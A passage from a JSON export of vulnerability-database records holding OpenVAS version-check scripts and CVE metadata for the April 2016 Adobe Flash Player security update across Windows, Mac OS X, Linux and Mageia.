to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow 
vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-050\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, test_version:\"21.0.0.213\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, 
vulnerable_range:\"Less than 21.0.0.213\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "description": "Mageia Linux Local Security Checks mgasa-2016-0134", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0134", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310131312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131312", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0134.nasl 11856 2018-10-12 07:45:29Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131312\");\n script_version(\"$Revision: 11856 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:14 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 09:45:29 +0200 (Fri, 12 Oct 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0134\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.616 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0134.html\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\", \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\", \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\", \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\", \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\", \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", 
re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0134\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.616~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:03", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-04-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-10 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310807653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807653", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-10 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; 
you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807653\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-04-12 18:40:52 +0530 (Tue, 12 Apr 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-10 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target 
host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.343 and 20.x before 21.0.0.213 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.343, or 21.0.0.213, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.212\"))\n{\n fix = \"21.0.0.213\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.343\"))\n{\n fix = \"18.0.0.343\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:17:42", "description": "This host is installed with Adobe Flash 
Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810716", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810716", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810716\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:07:47 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption 
vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:19:09", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", 
"CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810667", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810667\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:05:37 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption 
vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:34", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-04-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-10 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", 
"CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310807655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807655", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-10 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807655\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-04-12 18:40:50 +0530 (Tue, 12 Apr 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-10 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.343 and 20.x before 21.0.0.213 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.343, or 21.0.0.213, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.212\"))\n{\n fix = \"21.0.0.213\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.343\"))\n{\n fix = \"18.0.0.343\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:20:58", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", 
"CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810668", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810668", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
